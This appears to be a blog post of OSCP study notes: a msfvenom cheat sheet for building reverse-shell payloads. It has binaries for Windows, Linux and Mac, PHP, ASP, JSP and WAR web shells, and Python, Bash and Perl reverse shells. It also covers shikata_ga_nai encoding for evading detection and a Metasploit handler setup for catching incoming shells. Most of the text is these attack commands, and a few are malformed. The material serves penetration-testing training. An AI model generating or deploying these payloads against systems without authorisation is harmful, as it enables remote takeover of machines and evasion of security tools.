OSCP – Msfvenom All in One

payload
Linux privilege escalationOSCP Study material

One of the most powerful utilities of Metasploit is its payload module. Its abilities are underutilized ( by the beginners ) mostly, due to lack of awareness. So to solve this for once and for all let’s see how we can make payloads for any platform in any situation.

A strong foundation is necessary for a strong and steady building. So, before the fun part let’s take a look at few much needed basic terminologies that will be required to make the payloads.

LHOST: IP address to open the listener on. It’s required to make a connection to the target machine. If you are on the same network then it’s your LAN IP if you are performing the attack over the internet then it’s your WAN IP.

LPORT: Again it’s one of your ports through which the connection will be made. Here you can give any random open port accordingly.

RHOST: IP of the target system.

RPORT: It’s the port on which the service is running that you are exploiting. Mostly it is preset in the exploits and scanner scripts.

SRVHOST: this option refers to the IP address of your current computer (i.e. the one you are using to execute the attack).

SRVPORT: this option refers to the port you will use for the exploitation

URIPATH: this refers to the text you’ll place in the end section of your chosen URI

PAYLOAD: Is the shellcode that’s gonna give you the reverse shell.

EXITFUNC:– This option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete.

There are 4 different values for EXITFUNC:

  1. None
  2. SEH
  3. Thread
  4. Process

Usually, it is set to thread or process, which corresponds to the ExitThread or ExitProcess calls. “none” technique will call GetLastError, effectively a no-op. The thread will then continue executing, allowing you to simply cat multiple payloads together to be run in serial.

EXITFUNC will be useful in some cases where after you exploited a box, you need a clean exit, even, unfortunately, the biggest problem is that many payloads don’t have a clean execution path after the EXITFUNC ? .

SEHThis method should be used when there is a structured exception handler (SEH) that will restart the thread or process automatically when an error occurs.
THREADThis method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit)
PROCESSThis method should be used with multi/handler. This method should also be used with any exploit where a master process restarts it on exit.

NOTE- Sometimes its importent to understand the senario of your system for example if your system is based on 32 bit architechure then you need to follow some certain switches from msfvenom for example :-

msfvenom -a x86  -p < your payload > LHOST= < your ip > LPORT= < your port > -f exe , elf , python 

Now let’s take a look at some basic MSFVENOM commands we will be using:

List payloads

msfvenom -l

Binaries

Windows Staged reverse TCP

msfvenom -p windows/meterpreter/reverse_tcp LHOST= <Your IP Address>   LPORT=4242 -f exe > reverse.exe

Windows Stageless reverse TCP

msfvenom -p windows/shell_reverse_tcp LHOST= <Your IP Address>   LPORT=4242 -f exe > reverse.exe

Linux Staged reverse TCP

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= <Your IP Address>   LPORT=4242 -f elf >reverse.elf

Linux Stageless reverse TCP

msfvenom -p linux/x86/shell_reverse_tcp LHOST= <Your IP Address>   LPORT=4242 -f elf >reverse.elf

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Generate encoded payloads

Shikata_ga_nai
msfvenom -p -e shikata_ga_nai -i 5 -f raw > reverse
msfvenom windows/exec cmd=calc.exe -e x86/alpha_mixed -t -v -a windows –platform window

EXITFUNC reverse TCP

msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<YOUR PORT> EXITFUNC=seh -e x86/shikata_ga_nai -b “\x00\x0a\x0d\x20” -i 2 

EXITFUNC meterpreter reverse TCP

msfvenom -p windows/meterpreter/reverse_tcp LHOST= <YOUR IP> LPORT= <YOUR PORT> EXITFUNC=seh -e x86/shikata_ga_nai -b “\x00\x0a\x0d\x20” -i 2

Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

References :-

  1. https://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/
  2. https://cs.gmu.edu/~xwangc/Publications/ISC2014-AttackCodeExtraction-final.pdf
  3. https://medium.com/@PenTest_duck/offensive-msfvenom-from-generating-shellcode-to-creating-trojans-4be10179bb86

3 thoughts on “OSCP – Msfvenom All in One

Leave a Reply

Your email address will not be published. Required fields are marked *